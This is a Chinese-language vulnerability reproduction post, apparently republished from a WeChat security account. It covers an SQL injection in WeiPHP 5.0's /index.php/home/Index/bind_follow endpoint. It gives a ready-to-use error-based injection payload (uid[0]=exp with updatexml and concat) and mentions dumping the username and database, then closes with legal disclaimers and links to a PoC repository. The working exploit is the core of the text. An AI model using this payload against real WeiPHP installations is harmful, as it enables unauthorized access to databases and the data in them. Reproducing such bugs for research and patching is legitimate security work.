本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。
漏洞描述
WeiPHP5.0
是在2019年停止更新的一个系统,漏洞挺多的,跟着复现分析一下,前面分析了一处由于拼接造成的注入,这里复现一下 WeiPHP5.0
的另一个SQL
注入漏洞
漏洞影响
WeiPHP5.0
最新版
可以据此下载
https://www.weiphp.cn/doc/download_source_installation.html
漏洞复现
访问如下链接并抓包
/index.php/home/Index/bind_follow
publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
post
或者 get
都可以,这里开了调试模式,因此可以使用报错注入
爆用户名
爆数据库
总结
之前对于 thinkphp
开发的系统很少去弄 SQL
相关的分析,因为觉得 thinkphp
可能做得比较完美了,但经过这一次的分析,觉得还是很有开发的潜力。
参考链接
-
http://wiki.peiqi.tech/wiki/cms/WeiPHP/WeiPHP5.0%20bind_follow%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
github
链接:https://github.com/N0puple/vulPOC
想要获取更多资讯,或者获取文中环境可以关注公众号 “安全漏洞复现”,回复 “漏洞环境”
往期回顾
原文始发于微信公众号(安全漏洞复现):WeiPHP5.0 SQL注入漏洞2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论